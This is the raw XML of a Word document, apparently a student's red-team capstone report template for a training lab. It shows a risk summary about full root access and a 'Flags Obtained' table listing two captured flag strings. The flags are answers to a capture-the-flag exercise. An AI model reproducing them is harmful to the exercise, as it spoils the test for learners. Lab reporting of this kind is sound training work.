        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rovide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a summary of the risk </w:t>
      </w:r>
      <w:r w:rsidR="00F26CD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the system if the vulnerabilities remain presen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17"/>
      </w:tblGrid>
      <w:tr w:rsidR="00250232" w:rsidRPr="002A5519" w14:paraId="7129F7EA" w14:textId="77777777" w:rsidTr="00686F36">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="032E0D77" w14:textId="151D862B" w:rsidR="00250232" w:rsidRPr="002A5519" w:rsidRDefault="00250232" w:rsidP="00686F36">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:color w:val="22B787"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18C7472E" w14:textId="40F688EE" w:rsidR="00250232" w:rsidRPr="00263D13" w:rsidRDefault="00263D13" w:rsidP="00686F36">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">The root user has complete control over the system, including the ability to freely access, create, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>delete</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> and modify data, create or delete user accounts, install malicious software or cause irreparable damage to the system. This could have a severe impact on the confidentiality, integrity and availability of client data and the ability for the business to operate.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6781947A" w14:textId="77777777" w:rsidR="00250232" w:rsidRPr="002A5519" w:rsidRDefault="00250232" w:rsidP="00686F36"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66F803FE" w14:textId="77777777" w:rsidR="00250232" w:rsidRDefault="00250232" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2631500B" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="287CADCA" w14:textId="6F74944D" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc85467580"/>
      <w:r w:rsidRPr="002A5519">
        <w:t>Flags Obtained</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="5223F141" w14:textId="6FED7785" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Record the local.txt and proof.txt file contents which have been captured from the vulnerable virtual machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:i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11"/>
        <w:gridCol w:w="5206"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="702B12EA" w14:textId="77777777" w:rsidTr="7E9490E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5221" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76158B91" w14:textId="7975EB0B" w:rsidR="002A5519" w:rsidRDefault="3BB2BC09" w:rsidP="7E9490E9">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Local.txt file contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5222" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33982E0A" w14:textId="54B6877D" w:rsidR="002A5519" w:rsidRDefault="00263D13" w:rsidP="7E9490E9">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00263D13">
              <w:t>WYWM{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00263D13">
              <w:t>fals3_cla1ms_ar3nt_th3_0nly_t4x_r1sk}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5519" w14:paraId="2F8C7A4B" w14:textId="77777777" w:rsidTr="7E9490E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5221" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F81A0AE" w14:textId="4322E517" w:rsidR="002A5519" w:rsidRDefault="3BB2BC09" w:rsidP="7E9490E9">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Proof.txt file contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5222" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AFE0ED9" w14:textId="2254BD97" w:rsidR="002A5519" w:rsidRDefault="00263D13" w:rsidP="7E9490E9">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00263D13">
              <w:t>WYWM{1_us3d_f1nd_t0_f1nd_a_vuln}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74AE6C0E" w14:textId="77777777" w:rsidR="008F5D57" w:rsidRPr="008F5D57" w:rsidRDefault="008F5D57" w:rsidP="008F5D57"/>
    <w:p w14:paraId="05D5C02E" w14:textId="07E52FB2" w:rsidR="006F3573" w:rsidRPr="002A5519" w:rsidRDefault="006F3573" w:rsidP="002A5519">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006F3573" w:rsidRPr="002A5519" w:rsidSect="00864637">
      <w:headerReference w:type="default" r:id="rId30"/>
      <w:footerReference w:type="default" r:id="rId31"/>
      <w:footerReference w:type="first" r:id="rId32"/>
      <w:pgSz w:w="11909" w:h="16834"/>
      <w:pgMar w:top="1440" w:right="832" w:bottom="1440" w:left="85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E3280" w14:textId="77777777" w:rsidR="00413797" w:rsidRDefault="00413797">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="034C9237" w14:textId="77777777" w:rsidR="00413797" w:rsidRDefault="0041379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Extrabold">
    <w:altName w:val="Tahoma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209D6" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002915F7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9610A" w14:textId="77777777" w:rsidR="006F3573" w:rsidRDefault="00A53253">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002915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A8437" w14:textId="77777777" w:rsidR="00413797" w:rsidRDefault="00413797">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="38022D07" w14:textId="77777777" w:rsidR="00413797" w:rsidRDefault="0041379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EF34D" w14:textId="03A4C757" w:rsidR="006F3573" w:rsidRDefault="00A53253">
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:right="-182"/>
      <w:rPr>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="57150" distB="57150" distL="57150" distR="57150" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6DBF29E4" wp14:editId="59B6FCC6">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5586675</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-285749</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="904875" cy="438150"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides" distT="57150" distB="57150" distL="57150" distR="57150"/>
          <wp:docPr id="11" name="image1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/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect t="-37037" b="-33333"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="904875" cy="438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D37364">
      <w:rPr>
        <w:color w:val="CCCCCC"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>REDTEAM ESSENTIALS – CAPSTONE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B1219"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5D820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45330"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1182F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65206"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="403812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104D1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BFFE0F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BA4392"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F2074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C11868"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="285E25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AC2B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64F43F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7075D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="259085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991CB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62A49A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0956E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8374923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D476F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2702CD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25136D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="553063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BF1676"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F98035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B8143C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B92ECA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AA60F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62D2B0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066816"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E040F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E829FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0FEE82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826158"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD2A52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6E4A2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="944827F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B11628"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="269CBB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A971BD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AE4DD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DFA1918"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C85E31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30835CC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B45254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432079"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0276B1E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1A5263"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="807693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504A47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57C210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0F42A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E99C9A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18730A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40F6AC7E"/>
    <w:lvl w:ilvl="0" w:tplc="2012D8B6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nov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61654F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B12A4C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9A6A74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DF631D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94063E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8F88FE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8113F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46B4DE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5428AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B607F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D3C4C21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="137C024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E026490"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7DEE8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1945272"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2670ED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4964F39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52945E5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FA290B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C2AFA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D70D0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8542A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FE0680C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E43457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0A3770"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5360F6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6F5DB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12CC71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1B40558"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B20C0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2517A4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16B213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296592A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="430EFA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58F7BAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68005D4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A742736"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC7AC4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DBF0F66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E93C2D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DE61DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80C474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83144F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F98035B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A4F73EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84EE3F5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EF67842"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="499AFB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363848">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="601500724">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1797989784">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="486287835">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="686979554">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2002198136">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1130827057">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1726181435">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2032341372">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="559633896">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1486239896">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="183131372">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1695957133">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="540900754">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="648628562">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="637105267">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1256864038">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1129855971">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1374577547">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="309672046">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1949728309">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="2062902908">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="867449869">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="609972035">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="511383707">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="2119832626">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="2033142234">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="288126804">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="135030190">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="103698318">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1067263001">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="565529833">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="860046344">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="2094469849">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="753279051">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="2120832625">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="491216936">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1235969941">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="903028251">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1673407620">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1952856896">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="973412110">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1163814229">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1893231291">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="530190931">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="89858083">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="167182496">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="222375804">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="767652668">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1084184717">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1933933119">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="92559371">
    <w:abstractNumId w:val="27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I3MjQzMrUwMDdV0lEKTi0uzszPAykwrAUABqEtNCwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="006F3573"/>
    <w:rsid w:val="00005781"/>
    <w:rsid w:val="00034B75"/>
    <w:rsid w:val="00113251"/>
    <w:rsid w:val="00123B9A"/>
    <w:rsid w:val="00134E8D"/>
    <w:rsid w:val="00190F09"/>
    <w:rsid w:val="001A2FA7"/>
    <w:rsid w:val="001E371C"/>
    <w:rsid w:val="0024169F"/>
    <w:rsid w:val="00241C26"/>
    <w:rsid w:val="00250232"/>
    <w:rsid w:val="002502E2"/>
    <w:rsid w:val="00263D13"/>
    <w:rsid w:val="00282B6F"/>
    <w:rsid w:val="002915F7"/>
    <w:rsid w:val="002937A4"/>
    <w:rsid w:val="002A4AD0"/>
    <w:rsid w:val="002A5519"/>
    <w:rsid w:val="002C147D"/>
    <w:rsid w:val="0031029B"/>
    <w:rsid w:val="0031141B"/>
    <w:rsid w:val="0033451A"/>
    <w:rsid w:val="00361C0C"/>
    <w:rsid w:val="003805B4"/>
    <w:rsid w:val="00396486"/>
    <w:rsid w:val="003A0974"/>
    <w:rsid w:val="003A4987"/>
    <w:rsid w:val="003C7869"/>
    <w:rsid w:val="00413797"/>
    <w:rsid w:val="004321E3"/>
    <w:rsid w:val="004912A2"/>
    <w:rsid w:val="00497B78"/>
    <w:rsid w:val="004B224A"/>
    <w:rsid w:val="004C74D3"/>
    <w:rsid w:val="004E6F37"/>
    <w:rsid w:val="005245A4"/>
    <w:rsid w:val="00535EEF"/>
    <w:rsid w:val="00544A4E"/>
    <w:rsid w:val="0058054A"/>
    <w:rsid w:val="005D1FD4"/>
    <w:rsid w:val="0060467D"/>
    <w:rsid w:val="00625478"/>
    <w:rsid w:val="006460D7"/>
    <w:rsid w:val="00647D4B"/>
    <w:rsid w:val="006538E2"/>
    <w:rsid w:val="006635E6"/>
    <w:rsid w:val="00664D2F"/>
    <w:rsid w:val="006676FD"/>
    <w:rsid w:val="00683603"/>
    <w:rsid w:val="0069502D"/>
    <w:rsid w:val="006A606D"/>
    <w:rsid w:val="006F3573"/>
    <w:rsid w:val="00720A18"/>
    <w:rsid w:val="00722A1C"/>
    <w:rsid w:val="00727B2F"/>
    <w:rsid w:val="00727D39"/>
    <w:rsid w:val="00750E50"/>
    <w:rsid w:val="007762BE"/>
    <w:rsid w:val="00793304"/>
    <w:rsid w:val="007C2FF6"/>
    <w:rsid w:val="007F5C17"/>
    <w:rsid w:val="00806A99"/>
    <w:rsid w:val="008301FC"/>
    <w:rsid w:val="008361AE"/>
    <w:rsid w:val="00864637"/>
    <w:rsid w:val="008710D8"/>
    <w:rsid w:val="008F5D57"/>
    <w:rsid w:val="00940F52"/>
    <w:rsid w:val="00943361"/>
    <w:rsid w:val="009831CE"/>
    <w:rsid w:val="009876D4"/>
    <w:rsid w:val="00995693"/>
    <w:rsid w:val="00996182"/>
    <w:rsid w:val="009A5981"/>
    <w:rsid w:val="009D37B2"/>
    <w:rsid w:val="009D531C"/>
    <w:rsid w:val="009E2337"/>
    <w:rsid w:val="00A11CB2"/>
    <w:rsid w:val="00A34F25"/>
    <w:rsid w:val="00A434CA"/>
    <w:rsid w:val="00A53253"/>
    <w:rsid w:val="00A61971"/>
    <w:rsid w:val="00A746C4"/>
    <w:rsid w:val="00A82CED"/>
    <w:rsid w:val="00A83FFD"/>
    <w:rsid w:val="00AE4C4D"/>
    <w:rsid w:val="00AF6FD6"/>
    <w:rsid w:val="00B6763A"/>
    <w:rsid w:val="00B946E2"/>
    <w:rsid w:val="00BC5A5D"/>
    <w:rsid w:val="00BD0F54"/>
    <w:rsid w:val="00BF5BA6"/>
    <w:rsid w:val="00BF689A"/>
    <w:rsid w:val="00C12A99"/>
    <w:rsid w:val="00C31C54"/>
    <w:rsid w:val="00C31E49"/>
    <w:rsid w:val="00C8387E"/>
    <w:rsid w:val="00C83CA1"/>
    <w:rsid w:val="00C90724"/>
    <w:rsid w:val="00CA2ADF"/>
    <w:rsid w:val="00CB4219"/>
    <w:rsid w:val="00CE22AC"/>
    <w:rsid w:val="00CF781C"/>
    <w:rsid w:val="00CF7989"/>
    <w:rsid w:val="00D1430F"/>
    <w:rsid w:val="00D20690"/>
    <w:rsid w:val="00D37364"/>
    <w:rsid w:val="00D444EB"/>
    <w:rsid w:val="00D65E85"/>
    <w:rsid w:val="00D717B1"/>
    <w:rsid w:val="00D7677E"/>
    <w:rsid w:val="00D828CA"/>
    <w:rsid w:val="00D95189"/>
    <w:rsid w:val="00DA5B43"/>
    <w:rsid w:val="00DF0573"/>
    <w:rsid w:val="00DF7D1E"/>
    <w:rsid w:val="00E25EF4"/>
    <w:rsid w:val="00E822AE"/>
    <w:rsid w:val="00E9219C"/>
    <w:rsid w:val="00EB0198"/>
    <w:rsid w:val="00EC22E3"/>
    <w:rsid w:val="00EF4274"/>
    <w:rsid w:val="00F26CD1"/>
    <w:rsid w:val="00F3284A"/>
    <w:rsid w:val="00F3791A"/>
    <w:rsid w:val="00F45272"/>
    <w:rsid w:val="00F71129"/>
    <w:rsid w:val="00FA3687"/>
    <w:rsid w:val="00FB02EF"/>
    <w:rsid w:val="00FC6049"/>
    <w:rsid w:val="28A98A85"/>
    <w:rsid w:val="3BB2BC09"/>
    <w:rsid w:val="7E949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37CFF"/>
  <w15:docId w15:val="{8E3C1748-8069-46FA-A2F9-762C88477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Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-GB" w:eastAsia="en-A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46C4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jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="22B787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jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="202026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jc w:val="center"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="22B787"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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2CED"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="22B787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82CED"/>
    <w:rPr>
      <w:b/>
      <w:color w:val="22B787"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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3">
    <w:name w:val="3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="2E75B5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FFFFF"/>
      <w:vAlign w:val="center"/>
    </w:tc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A34F25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A34F25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A34F25"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A34F25"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A34F2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27D3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7D39"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00727D3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7D39"/>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
